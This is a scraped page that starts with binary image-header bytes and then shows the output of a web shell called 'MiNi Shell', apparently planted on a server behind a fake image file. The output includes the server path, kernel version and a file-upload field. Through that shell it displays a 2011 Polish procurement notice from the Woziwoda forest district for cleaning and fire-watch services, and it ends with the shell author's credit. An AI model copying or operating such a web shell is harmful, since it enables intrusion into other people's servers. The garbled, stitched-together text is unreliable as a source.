JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110203/39577-N-2011.html

<p class="kh_header"><b>Legbąd: Realizacja zadań gospodarczych z zakresu leśnictwa- ochrony przeciwpożarowej oraz usług z zakresu prac porządkowych w pomieszczeniach budynków Nadleśnictwa Woziwoda w latach 2011-2013</b><br>
<b>Numer ogłoszenia: 39577 - 2011; data zamieszczenia: 03.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Woziwoda , Woziwoda 3, 89-504 Legbąd, woj. kujawsko-pomorskie, tel. 0-52 3360910, faks 0-52 3360913.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.woziwoda.torun.lasy.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka organizacyjna nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja zadań gospodarczych z zakresu leśnictwa- ochrony przeciwpożarowej oraz usług z zakresu prac porządkowych w pomieszczeniach budynków Nadleśnictwa Woziwoda w latach 2011-2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są: 
I.Prace porządkowe w obiektach nadleśnictwa-część 1-
Przedmiotem zamówienia jest codzienne sprzątanie pomieszczeń w obiektach:
1. Budynek administracyjny nadleśnictwa o pow. ogółem 405,50 m2 w tym:
- parter: pokoje 1,4,9,10,11,12,13 o pow. 125,35 m2,wc o powierzchni 16,42 m2 świetlica o powierzchni 36,64 m2, serwer o powierzchni 2,78 m2, korytarze o powierzchni 29,18 m2. Razem 210,37 m2.Piętro pokoje 1 do 4 o powierzchni 77,67 m2
wc o powierzchni 13,23 m2, pomieszczenie kuchenne o powierzchni 13,57 m2, korytarze o powierzchni 14,93 m2, klatka schodowa o powierzchni 47,66 m2-razem 167,06 m2. Poddasze -  pokój o powierzchni 15,05 m2, wc o powierzchni 2,10 m2, korytarze o powierzchni 10,92 m2 - razem 28,07 m2  
2. Ośrodek Edukacji Przyrodniczo-Leśnej o pow. ogółem 277,25 m2 w tym: 
 parter  sala audiowizualna o powierzchni 44,46 m2, pomieszczenie techniczne o powierzchni 8,68 m2, hol o powierzchni 63,69 m2, wc o powierzchni 12,54 m2,
aneks pomocniczy o powierzchni 13,31 m2, pomieszczenie wielofunkcyjne o pow. 9,07 m2, przedsionek o pow. 2,26 m2, składzik o pow. 2,71 m2, razem: 156,72 m2
- poddasze:antresola i poddasze o pow. 120,53 m2 
w obiektach I-II ogółem o pow. 682,75 m2 zakres prac przewiduje:
-sprzątanie podłóg i posadzek, odkurzanie, mycie, czyszczenie dywanów i wykładzin podłogowych - codziennie; 
-opróżnianie koszy na śmieci, czyszczenie ubikacji, pisuarów, zlewów i -zlewozmywaków, uzupełnianie papieru toaletowego, mydła, kostek toaletowych, odświeżaczy, ręczników jednorazowych  - codziennie;
-czyszczenie parapetów, biurek, stołów, stolików, szaf itp, - codziennie;
-mycie naczyń po naradach i sesjach, pranie obrusów - wg potrzeb;
-podlewanie i pielęgnowanie kwiatów znajdujących się w biurze wg potrzeb
-mycie drzwi zewnętrznych i wewnętrznych, balustrad oraz poręczy - raz w tygodniu;
-mycie glazury, luster, boazerii - raz w tygodniu;
-gruntowne sprzątanie pomieszczeń kuchennych łącznie z czyszczeniem sprzętu AGD - raz w tygodniu;
-odkurzanie sprzętu biurowego - raz w tygodniu;
- Wiosenne i jesienne mycie okien (łącznie z futrynami i parapetami), pranie firan, czyszczenie żaluzji, wykładzin oraz dywanów;
-Co najmniej raz do roku, jesienią- mycie szyb w lampach na placu przed 
      n-ctwem i w obrębie Ośrodka EP-L;
3. Zielona Szkoła o pow. ogółem 350,23 m2
	      - parter: świetlica o pow. 94,03 m2,
	                    pomieszczenie kuchenne o pow. 18,95 m2,
                              hol o pow. 35,84 m2,
		         wc o pow. 15,30 m2,
                              schowek o pow. 0,60 m2,
		         pokoje 1-2 o pow. 28,89 m2,
		Razem: 193,61 m2,
	       - poddasze: 
                               pokoje 3-6 o pow. 85,90 m2,
		          korytarze o pow. 44,80 m2,
                               wc o pow. 25,92 m2,
		  Razem: 156,62 m2 ,
	4. Pokoje gościnne o pow. ogółem 80,18 m2,
                 - parter: pokoje 1-2 o pow. 43,98 m2,
                               kuchnia o pow. 9,50 m2,
                               łazienka o pow. 3,46 m2,
                               korytarz o pow. 2,92 m2,
                               Razem: 59,86 m2,
	       - poddasze: pokój z aneksem o pow. 20,32 m2

W obiektach 3 i 4 ogółem o pow. 430,41 m2 zakres prac przewiduje:
- mycie podłóg i posadzek, opróżnianie koszy na śmieci, sprzątanie kuchni, łazienek i znajdujących się tam urządzeń higieniczno-sanitarnych, odkurzanie i czyszczenie umeblowania oraz znajdującego się sprzętu RTV, AGD, mycie okien - wg potrzeb, nie rzadziej jak raz na dwa tygodnie
Wykonawca zapewnia środki czystości w postaci płynów do mycia, proszków, past,  
      kostek WC oraz sprzęt potrzebny do sprzątania.
Zamawiający zakupuje we własnym zakresie środki czystości takie jak: papier  
      toaletowy, ręczniki papierowe, mydło w płynie oraz worki foliowe.

II Pełnienie dyżurów na wieży ppoż. - część 2
1.	Obsługa Punktu Obserwacyjnego odbywa się na wieży ppoż. znajdującej się w oddz. 242 położonej na terenie Leśnictwa Lipowa.  
2.	Dyżury na wieży ppoż.  Nadleśnictwa Woziwoda pełnione są w okresie bezpośredniego zagrożenia pożarowego tj. w okresie od 1.IV do 30.IX. 
3.	Z uwagi na zmienność panujących warunków atmosferycznych okres pełnienia dyżuru  określony w pkt. 2 może ulec zmianie.
4.	Szczegółowo dyżur na wieży ppoż.  pełniony jest przy I, II i III stopniu zagrożenia, zgodnie z poniższym harmonogramem
-kwiecień, wrzesień - od 9.00 do 18.00
-maj, sierpień,   - od 9.00 do 19.00
-czerwiec, lipiec - od 9.00 do 20.00
5.	Czasy pełnienia dyżurów na wieży ppoż  określone w pkt 4, mogą ulec zmianie.
      Władnym zmiany wymienionych godzin jest Nadleśniczy bądź dyżurujący 
       Pełnomocnik Nadleśniczego.  
6.	Wiedza i umiejętności jakie powinien posiadać obserwator:
- znajomość obserwowanego terenu,
- znajomość procedur i instrukcji dotyczących ochrony p.poż.,  
- umiejętność posługiwania się radiotelefonem,
- umiejętność określania kierunku zagrożenia za pomocą kierunkomierza, 
- umiejętność posługiwania się mapą.

Dyżurny PAD winien ponadto być osobą dyspozycyjną i komunikatywną.

7.	Do wykonania zadania obsługi wieży ppoż. Zamawiający udostępnia wymagany sprzęt oraz przepisy, instrukcje i zarządzenia , które są niezbędne w prawidłowej obsłudze  punktu obserwacyjnego oraz współpracy z Punktem Alarmowo-Dyspozycyjnym i pracownikami nadleśnictwa. 


III. Pełnienie dyżurów w PAD Nadleśnictwa Woziwoda - część 3


1.	Obsługa Punktu Alarmowego-Dyspozycyjnego dalej nazywanego- dyżuru PAD- odbywa się w siedzibie zamawiającego, Woziwoda 3, 89-504 Legbąd, pokój nr 1.  
2.	Dyżury PAD Nadleśnictwa Woziwoda pełnione są w okresie bezpośredniego zagrożenia pożarowego tj. w okresie od 1.IV do 30.IX. 
3.	Z uwagi na zmienność panujących warunków atmosferycznych okres pełnienia dyżuru    PAD określony w pkt. 2 może ulec zmianie.
4.	Szczegółowo dyżur na wieży ppoż.  pełniony jest przy I, II i III stopniu zagrożenia, zgodnie z poniższym harmonogramem
                                 - kwiecień, wrzesień - od 9 do 18.00
                                    maj, sierpień,   - od 9.00 do 19.00
                        czerwiec, lipiec - od 9.00 do 20.00
                                - w dni robocze, w godzinach pracy Nadleśnictwa dyżur pełni pracownik ds. p.poż. lub osoba go zastępująca

5.	Czasy pełnienia dyżurów PAD określone w pkt 4, mogą ulec zmianie. Władnym zmiany wymienionych godzin jest Nadleśniczy bądź pełniący dyżur Pełnomocnik Nadleśniczego.

6.	 Wiedza i umiejętności jakie powinien posiadać dyżurny(a) PAD:
- znajomość terenu nadleśnictwa 
- umiejętność posługiwania się radiotelefonem, telefonem stacjonarnym i komórkowym,
- umiejętność posługiwania się mapą, w tym: odczytywania znaków graficznych, określania odległości, odnajdowania określonych punktów, odnajdowania dróg dojazdowych, 
- umiejętność określenia miejsca powstania pożaru z wykorzystaniem informacji pochodzących z wież ppoż. oraz  przy użyciu map analogowych i numerycznych 
- umiejętność podstawowej obsługi komputera 
- znajomość obowiązujących procedur i instrukcji p.poż. w Nadleśnictwie Woziwoda

         Dyżurny PAD winien ponadto być osobą dyspozycyjną i komunikatywną. 

7.	Do wykonania zadania obsługi PAD Zamawiający udostępnia wymagany sprzęt 
      oraz instrukcje i zarządzenia , które są niezbędne w prawidłowej obsługi Punktu 
     Alarmowo-Dyspozycyjnego nadleśnictwa..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamówienia uzupełniające przewiduje się w przypadku wydłużenia okresu dyżuru w PAD i na wieży ppoż.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 77.20.00.00-2, 77.23.10.00-8, 77.23.15.00-3, 90.91.90.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu w oparciu o SIWZ, metodą warunku granicznego spełnia/nie spełnia. Wykonawcy, którzy nie wykażą spełnienia warunków udziału w postępowaniu podlegać będą wykluczeniu z udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu w oparciu o SIWZ, metodą warunku granicznego spełnia/nie spełnia. Wykonawcy, którzy nie wykażą spełnienia warunków udziału w postępowaniu podlegać będą wykluczeniu z udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu w oparciu o SIWZ, metodą warunku granicznego spełnia/nie spełnia. Wykonawcy, którzy nie wykażą spełnienia warunków udziału w postępowaniu podlegać będą wykluczeniu z udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu w oparciu o SIWZ, metodą warunku granicznego spełnia/nie spełnia. Wykonawcy, którzy nie wykażą spełnienia warunków udziału w postępowaniu podlegać będą wykluczeniu z udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu w oparciu o SIWZ, metodą warunku granicznego spełnia/nie spełnia. Wykonawcy, którzy nie wykażą spełnienia warunków udziału w postępowaniu podlegać będą wykluczeniu z udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Zaświadczenie dla obserwatora wieży załącznik nr 7A, zaświadczenie dla dyżurnego PAD załącznik nr 7B, Zaświadczenie o znajomości terenu Nadleśnictwa Woziwoda i procedur obowiązujących w PAD załącznik nr 8 zgodnie z SIWZ</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy - wypełniony i podpisany przez wykonawcę załącznik nr 1. Wykaz części zamówienia, które Wykonawca zamierza powierzyć podwykonawcom - załącznik nr 9 - zgodnie z SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.woziwoda.torun.lasy.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Woziwoda, Woziwoda 3, 89-504 Legbąd, tel 0 52 33 60 910,  0 52 33 60 913.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.02.2011 godzina 11:00, miejsce: Nadleśnictwo Woziwoda, Woziwoda 3, 89-504 Legbąd, tel 0 52 33 60 910, fax 0 52 33 60 913.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com